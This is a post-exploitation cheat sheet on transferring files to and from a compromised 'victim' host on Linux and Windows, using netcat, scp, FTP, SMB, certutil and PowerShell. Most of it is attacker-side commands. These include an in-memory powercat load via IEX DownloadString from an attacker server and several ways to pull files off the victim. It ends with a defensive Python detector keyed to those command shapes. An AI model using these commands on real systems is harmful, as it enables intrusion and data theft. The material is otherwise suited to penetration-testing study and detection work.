Linux
Simple HTTP Server
With this method we host the file to upload on a simple Python web server and then download it on the victim with wget (or with curl if wget is not installed). Any other web server would work, but we use this one for its simplicity. SimpleHTTPServer is the Python 2 module name; in Python 3 the same module is called http.server.
Attacking machine command:
python -m SimpleHTTPServer 80
Victim machine command:
wget http://192.168.1.35/FiletoTransfer
curl -o FiletoTransfer http://192.168.1.35/FiletoTransfer
SCP (SSH utility)
This method is only valid if the target machine has SSH and we have the credentials. We will use the scp utility to transfer the file.
Attacking machine command:
scp FiletoTransfer tester@192.168.1.39:/home/tester/iron/
Netcat
We will use netcat, the tool known as the hacker's Swiss Army knife.
Most Linux machines have it installed, which is an advantage.
Victim machine command:
nc -lvp 4444 > FiletoTransfer
Attacking machine command:
nc 192.168.1.39 4444 -w 3 < FiletoTransfer
FTP
We will start a temporary FTP server (a conventional FTP server would also work) using the twistd utility, then connect to it from the victim and download the file.
Attacking machine command:
twistd -n ftp -r .
Victim machine command:
wget ftp://192.168.1.35:2121/FiletoTransfer
Simple HTTP Server
This method is the same as the one used to upload a file, but in the other direction. In this case the victim machine must have Python to run the simple server. Keep in mind that we will not have permission to open just any port. If a web server such as Apache is running, we could instead move the file into its web folder, although we would need the right permissions to do so.
Victim machine command:
python -m SimpleHTTPServer 8080
Attacking machine command:
wget http://192.168.1.39:8080/FiletoDownload
Netcat
We will also use netcat, in the reverse of the order used to upload the file to the victim machine. It is important to take into account the permissions on the ports to be used.
Attacking machine command:
nc -lvp 4444 > FiletoDownload
Victim machine command:
nc 192.168.1.35 4444 -w 3 < FiletoDownload
SCP (SSH utility)
This method will only be valid if the target machine has ssh and we have the credentials.
We will use the scp utility to transfer the file from the victim machine to ours.
Attacking machine command:
scp tester@192.168.1.39:/home/tester/iron/FiletoDownload .
Windows
PowerShell DownloadFile
With this method we host the file to upload on a simple Python web server and then download it with the DownloadFile function of PowerShell. Any other web server would work, but we use this one for its simplicity.
Attacking machine command:
python -m SimpleHTTPServer 8080
Victim machine command:
powershell.exe -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.10.1:8080/FiletoTransfer','C:\Users\test\Desktop\FiletoTransfer')"
Certutil.exe
With our hosted file we will use the Microsoft tool certutil.exe to download the file we want.
Attacking machine command:
python -m SimpleHTTPServer 8080
Victim machine command:
certutil.exe -urlcache -split -f http://10.10.10.1:8080/FiletoTransfer FiletoTransfer
Netcat
This method is similar to the netcat method used on Linux. To make the transfer this way we must have the netcat binary for Windows.
Victim machine command:
nc.exe -lvp 4444 > FiletoTransfer
Attacking machine command:
nc 10.10.10.2 4444 -w 3 < FiletoTransfer
FTP
We will use a temporary FTP server to host our file. Windows has an FTP client pre-installed, so we will use it to connect and download the desired file. Our shell may not be interactive, in which case we have to use a command file to connect and download the file.
Attacking machine command:
twistd -n ftp -r .
Victim machine command:
ftp
open 10.10.10.1 2121
anonymous
get FiletoTransfer
bye
SMB
Using impacket-smbserver we will share an SMB folder from our machine, which we will access from the victim machine to download the file.
Attacking machine command:
impacket-smbserver -smb2support test .
Victim machine command:
copy \\10.10.10.1\test\FiletoTransfer FiletoTransfer
Download victim files
FTP
With this method we will start a temporary FTP server in the folder where our file is located, but this time with write permission. We will then connect from the victim and upload our file.
Attacking machine command:
python -m pyftpdlib -w
Victim machine command:
ftp
open 10.10.10.1 2121
anonymous
put FiletoDownload
bye
Netcat
This method is similar to the netcat method used to upload files, but in reverse. To make the transfer this way we must have the netcat binary for Windows.
Attacking machine command:
nc -lvp 4444 > FiletoDownload
Victim machine command:
nc.exe 10.10.10.1 4444 -w 3 < FiletoDownload
SMB
Using impacket-smbserver we will share an SMB folder from our machine, which we will access from the victim machine to copy the file to be downloaded into our SMB folder.
Attacking machine command:
impacket-smbserver -smb2support test .
Victim machine command:
copy FiletoDownload \\10.10.10.1\test\FiletoDownload
Powercat
In this method we will load the powercat module into memory. Powercat is a tool with which we can, among other things, open a shell and send files; here we will use it to send a file. We have the powercat.ps1 file hosted on our machine and load it using the DownloadString function. We then execute powercat to send the file and download it on our machine with wget. The download will never appear to end, so we cancel it once it should have finished, which depends on the size of the file.
Victim machine command:
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.10.1/powercat.ps1');powercat -l -p 4444 -i C:\Users\test\FiletoDownload"
Attacking machine command:
wget http://10.10.10.2:4444/FiletoDownload
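Seen from the defender's side, the commands above leave recognizable process-creation command lines. The following is an added example, not part of the original page: it matches the command shapes shown here against logged command lines; the rule names, host names and sample events are constructed for illustration.

```python
import re

# Added example: rule names are labels invented here, and the patterns cover
# only the command shapes shown on this page (no wget/curl/scp, which are
# too common to flag from the command line alone).
RULES = {
    "python-http-server": r"\bpython[\d.]*(\.exe)?\s+-m\s+(SimpleHTTPServer|http\.server)\b",
    "adhoc-ftp-server": r"\btwistd\b.*\sftp\b|\bpython[\d.]*\s+-m\s+pyftpdlib\b",
    "impacket-smbserver": r"\bimpacket-smbserver\b",
    # Any option group containing "l" (-l, -lvp, ...) means listen mode.
    "netcat-listener": r"\b(nc|ncat|netcat)(\.exe)?\s+(?:\S+\s+)*?-[a-z]*l[a-z]*\b",
    "certutil-urlcache": r"\bcertutil(\.exe)?\s.*[-/]urlcache\b.*\bhttps?://",
    "powershell-download": r"\bpowershell(\.exe)?\s.*\bNet\.WebClient\b.*\.Download(File|String)\b",
    # UNC path whose server part is a raw IPv4 address rather than a host name.
    "copy-unc-ip": r"\bcopy\s.*\\\\\d{1,3}(?:\.\d{1,3}){3}\b",
}
COMPILED = {name: re.compile(rx, re.IGNORECASE) for name, rx in RULES.items()}


def match_rules(cmdline):
    """Return the sorted names of every rule the command line triggers."""
    return sorted(n for n, rx in COMPILED.items() if rx.search(cmdline))


def triage(events):
    """Map (host, cmdline) events to {host: set of rule names}, hits only."""
    hits = {}
    for host, cmdline in events:
        for name in match_rules(cmdline):
            hits.setdefault(host, set()).add(name)
    return hits


# Constructed process-creation events (host, command line); not real logs.
SAMPLE_EVENTS = [
    ("web01", "python -m SimpleHTTPServer 8080"),
    ("web01", "nc -lvp 4444"),
    ("web01", "nc 192.168.1.35 4444 -w 3"),              # sender: no -l flag
    ("web01", "python -m json.tool report.json"),         # benign
    ("ws07", "certutil.exe -urlcache -split -f http://10.10.10.1:8080/FiletoTransfer FiletoTransfer"),
    ("ws07", "certutil.exe -hashfile setup.exe SHA256"),  # benign
    ("ws07", r"cmd.exe /c copy \\10.10.10.1\test\FiletoTransfer FiletoTransfer"),
    ("ws07", r'''powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.10.1/powercat.ps1')"'''),
]

if __name__ == "__main__":
    for host, rules in sorted(triage(SAMPLE_EVENTS).items()):
        print(host, sorted(rules))
```

Shell redirections such as `> FiletoTransfer` are handled by the parent shell and usually do not appear in the child's logged command line, so the rules key on the program name and its options only.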